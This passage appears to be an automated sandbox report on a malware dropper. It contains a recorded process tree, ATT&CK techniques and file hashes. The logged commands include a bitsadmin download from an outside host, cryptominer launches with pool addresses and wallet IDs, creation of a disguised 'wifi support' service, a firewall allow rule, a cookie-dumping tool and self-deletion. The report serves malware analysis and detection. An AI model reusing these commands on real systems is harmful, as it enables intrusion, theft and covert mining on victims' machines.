                                                                                                                  8⤵
                                                                                                                    PID:4132
                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxBDB5.tmp\tempfile.ps1"
                                                                                                                    8⤵
                                                                                                                      PID:4752
                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxBDB5.tmp\tempfile.ps1"
                                                                                                                      8⤵
                                                                                                                        PID:5824
                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxBDB5.tmp\tempfile.ps1"
                                                                                                                        8⤵
                                                                                                                          PID:4476
                                                                                                                        • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                          "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                                                                          8⤵
                                                                                                                          • Download via BitsAdmin
                                                                                                                          PID:3528
                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ifdrrmwr.mkl\GcleanerWW.exe /mixone & exit
                                                                                                                      6⤵
                                                                                                                        PID:4156
                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pgtoxfuq.tt2\inst.exe & exit
                                                                                                                        6⤵
                                                                                                                          PID:1440
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\pgtoxfuq.tt2\inst.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\pgtoxfuq.tt2\inst.exe
                                                                                                                            7⤵
                                                                                                                              PID:5848
                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xeqet4tq.0lf\c7ae36fa.exe & exit
                                                                                                                            6⤵
                                                                                                                              PID:5192
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\xeqet4tq.0lf\c7ae36fa.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\xeqet4tq.0lf\c7ae36fa.exe
                                                                                                                                7⤵
                                                                                                                                  PID:764
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                                                        2⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:4416
                                                                                                                        • C:\Users\Admin\AppData\Roaming\1FBE.tmp.exe
                                                                                                                          "C:\Users\Admin\AppData\Roaming\1FBE.tmp.exe"
                                                                                                                          3⤵
                                                                                                                            PID:4964
                                                                                                                            • C:\Users\Admin\AppData\Roaming\1FBE.tmp.exe
                                                                                                                              "C:\Users\Admin\AppData\Roaming\1FBE.tmp.exe"
                                                                                                                              4⤵
                                                                                                                                PID:4328
                                                                                                                            • C:\Users\Admin\AppData\Roaming\24A1.tmp.exe
                                                                                                                              "C:\Users\Admin\AppData\Roaming\24A1.tmp.exe"
                                                                                                                              3⤵
                                                                                                                                PID:5328
                                                                                                                                • C:\Windows\system32\msiexec.exe
                                                                                                                                  -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w21427@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                                                                  4⤵
                                                                                                                                    PID:5616
                                                                                                                                  • C:\Windows\system32\msiexec.exe
                                                                                                                                    -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w18536 --cpu-max-threads-hint 50 -r 9999
                                                                                                                                    4⤵
                                                                                                                                      PID:6056
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                                                                    3⤵
                                                                                                                                      PID:5944
                                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                        ping 127.0.0.1
                                                                                                                                        4⤵
                                                                                                                                        • Runs ping.exe
                                                                                                                                        PID:5632
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                                                                                    2⤵
                                                                                                                                      PID:5456
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                                                                                      2⤵
                                                                                                                                        PID:5252
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                          3⤵
                                                                                                                                            PID:5716
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                            3⤵
                                                                                                                                              PID:5460
                                                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                          1⤵
                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                          PID:1144
                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                            2⤵
                                                                                                                                            • Drops file in System32 directory
                                                                                                                                            • Checks processor information in registry
                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                            • Modifies registry class
                                                                                                                                            PID:2052
                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                          1⤵
                                                                                                                                          • Drops file in Windows directory
                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                          • Modifies registry class
                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                          PID:6068
                                                                                                                                        • C:\Windows\system32\browser_broker.exe
                                                                                                                                          C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                          1⤵
                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                          PID:4616
                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                          1⤵
                                                                                                                                            PID:5000
                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                            1⤵
                                                                                                                                              PID:504
                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                              1⤵
                                                                                                                                                PID:4960
                                                                                                                                              • C:\Windows\system32\browser_broker.exe
                                                                                                                                                C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                1⤵
                                                                                                                                                  PID:5808
                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                  1⤵
                                                                                                                                                    PID:4140
                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                    1⤵
                                                                                                                                                      PID:5588
                                                                                                                                                      • C:\Windows\system32\WerFault.exe
                                                                                                                                                        C:\Windows\system32\WerFault.exe -u -p 5588 -s 2316
                                                                                                                                                        2⤵
                                                                                                                                                        • Program crash
                                                                                                                                                        PID:3676
                                                                                                                                                      • C:\Windows\system32\WerFault.exe
                                                                                                                                                        C:\Windows\system32\WerFault.exe -u -p 5588 -s 2324
                                                                                                                                                        2⤵
                                                                                                                                                        • Program crash
                                                                                                                                                        PID:5216
                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                      1⤵
                                                                                                                                                        PID:4824
                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                        1⤵
                                                                                                                                                          PID:5468
                                                                                                                                                        • C:\Windows\system32\werfault.exe
                                                                                                                                                          werfault.exe /h /shared Global\dd6d76f4b8794426b2a41ad23d20d402 /t 5164 /p 5468
                                                                                                                                                          1⤵
                                                                                                                                                            PID:6140
                                                                                                                                                          • C:\Windows\system32\werfault.exe
                                                                                                                                                            werfault.exe /h /shared Global\972b0b6073b44deeaf9f24a3dd5db4a4 /t 0 /p 4140
                                                                                                                                                            1⤵
                                                                                                                                                              PID:5596
                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                              1⤵
                                                                                                                                                                PID:1276
                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:5188
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\391.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\391.exe
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:5472
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\622.exe
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\622.exe
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:3172
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\14D9.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\14D9.exe
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:6092
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6092 -s 868
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Program crash
                                                                                                                                                                          PID:5876
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6092 -s 896
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Program crash
                                                                                                                                                                          PID:4340
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6092 -s 924
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Program crash
                                                                                                                                                                          PID:4648
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6092 -s 976
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Program crash
                                                                                                                                                                          PID:2264
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6092 -s 1128
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Program crash
                                                                                                                                                                          PID:5192
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6092 -s 1192
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Program crash
                                                                                                                                                                          PID:764
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6092 -s 1232
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Program crash
                                                                                                                                                                          PID:760
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6092 -s 1192
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Program crash
                                                                                                                                                                          PID:4772
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1DA4.exe
                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\1DA4.exe
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:4356
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\22E5.exe
                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\22E5.exe
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:5664
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\2816.exe
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\2816.exe
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:5640
                                                                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:5392
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\3333.exe
                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\3333.exe
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:4112
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\647349126.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\647349126.exe"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:5952
                                                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:3232
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1371397063.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\1371397063.exe"
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:5676
                                                                                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                            C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:5268
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\38B2.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\38B2.exe
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:4244
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\gscyldjx\
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:4804
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\yyzkfgem.exe" C:\Windows\SysWOW64\gscyldjx\
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:2960
                                                                                                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                  "C:\Windows\System32\sc.exe" create gscyldjx binPath= "C:\Windows\SysWOW64\gscyldjx\yyzkfgem.exe /d\"C:\Users\Admin\AppData\Local\Temp\38B2.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:5852
                                                                                                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                    "C:\Windows\System32\sc.exe" description gscyldjx "wifi internet conection"
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:5352
                                                                                                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                      "C:\Windows\System32\sc.exe" start gscyldjx
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:5844
                                                                                                                                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                        "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:5760
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\399D.exe
                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\399D.exe
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:5028
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\3E9F.exe
                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\3E9F.exe
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:5996
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\4C9B.exe
                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\4C9B.exe
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:5528
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\5A96.exe
                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\5A96.exe
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:6012
                                                                                                                                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:4640
                                                                                                                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                    C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:4620
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\70BF.exe
                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\70BF.exe
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:1728
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7AE1.exe
                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7AE1.exe
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:4552
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\gscyldjx\yyzkfgem.exe
                                                                                                                                                                                                                        C:\Windows\SysWOW64\gscyldjx\yyzkfgem.exe /d"C:\Users\Admin\AppData\Local\Temp\38B2.exe"
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:5880
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\839D.exe
                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\839D.exe
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:764

                                                                                                                                                                                                                          Network

                                                                                                                                                                                                                          MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                          Persistence

                                                                                                                                                                                                                          New Service

                                                                                                                                                                                                                          1
                                                                                                                                                                                                                          T1050

                                                                                                                                                                                                                          Modify Existing Service

                                                                                                                                                                                                                          1
                                                                                                                                                                                                                          T1031

                                                                                                                                                                                                                          Registry Run Keys / Startup Folder

                                                                                                                                                                                                                          1
                                                                                                                                                                                                                          T1060

                                                                                                                                                                                                                          BITS Jobs

                                                                                                                                                                                                                          1
                                                                                                                                                                                                                          T1197

                                                                                                                                                                                                                          Privilege Escalation

                                                                                                                                                                                                                          New Service

                                                                                                                                                                                                                          1
                                                                                                                                                                                                                          T1050

                                                                                                                                                                                                                          Defense Evasion

                                                                                                                                                                                                                          Modify Registry

                                                                                                                                                                                                                          2
                                                                                                                                                                                                                          T1112

                                                                                                                                                                                                                          BITS Jobs

                                                                                                                                                                                                                          1
                                                                                                                                                                                                                          T1197

                                                                                                                                                                                                                          Credential Access

                                                                                                                                                                                                                          Credentials in Files

                                                                                                                                                                                                                          1
                                                                                                                                                                                                                          T1081

                                                                                                                                                                                                                          Discovery

                                                                                                                                                                                                                          Software Discovery

                                                                                                                                                                                                                          1
                                                                                                                                                                                                                          T1518

                                                                                                                                                                                                                          Query Registry

                                                                                                                                                                                                                          3
                                                                                                                                                                                                                          T1012

                                                                                                                                                                                                                          System Information Discovery

                                                                                                                                                                                                                          3
                                                                                                                                                                                                                          T1082

                                                                                                                                                                                                                          Remote System Discovery

                                                                                                                                                                                                                          1
                                                                                                                                                                                                                          T1018

                                                                                                                                                                                                                          Collection

                                                                                                                                                                                                                          Data from Local System

                                                                                                                                                                                                                          1
                                                                                                                                                                                                                          T1005

                                                                                                                                                                                                                          Command and Control

                                                                                                                                                                                                                          Web Service

                                                                                                                                                                                                                          1
                                                                                                                                                                                                                          T1102

                                                                                                                                                                                                                          Replay Monitor

                                                                                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                                                                                          Downloads

                                                                                                                                                                                                                          • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                                                                                                                          • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                                                                                                                          • C:\Program Files\Windows Sidebar\CNELRCUCGA\ultramediaburner.exe
                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                                                                                                                          • C:\Program Files\Windows Sidebar\CNELRCUCGA\ultramediaburner.exe
                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                                                                                                                          • C:\Program Files\install.dat
                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            806c3221a013fec9530762750556c332

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            36475bcfd0a18555d7c0413d007bbe80f7d321b5

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            9bcecc5fb84d21db673c81a7ed1d10b28686b8261f79136f748ab7bbad7752f7

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            56bbaafe7b0883f4e5dcff00ae69339a3b81ac8ba90b304aeab3e4e7e7523b568fd9b269241fc38a39f74894084f1f252a91c22b79cc0a16f9e135859a13145e

                                                                                                                                                                                                                          • C:\Program Files\install.dat
                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            31e4a5735b20be6a53cbb552663b1cc3

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            c080a61b65a34928a1fb1899db8a3698a4892a4c

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            b28936c7d89e33fdc4eace2d0e92ed7d3b02bbfc5e7c8297d16f721d0254305f

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            3e98a84f11ca1eb27e894ce6ac7c6ff6c37382459a467ef30a87bfe36149960c5c76f2beeb9415ab3287f002012e65c4f754dcd17045986306c6afab399a0604

                                                                                                                                                                                                                          • C:\Program Files\install.dll
                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                                                                                                                                          • C:\Program Files\install.dll
                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                            0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                                                                                                                                          • C:\Program Files\libEGL.dll
                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                            cc0f81a657d6887e246f49151e60123d

                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                            1eb31528501c375817853e09d95b7152858c5b31

                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                            31fd8f7d1ab67c7b4f332d2d4518b99d2bb344ac577044b44551cd7e6f58dbbb

                                                                                                                                                                                                                            SHA512

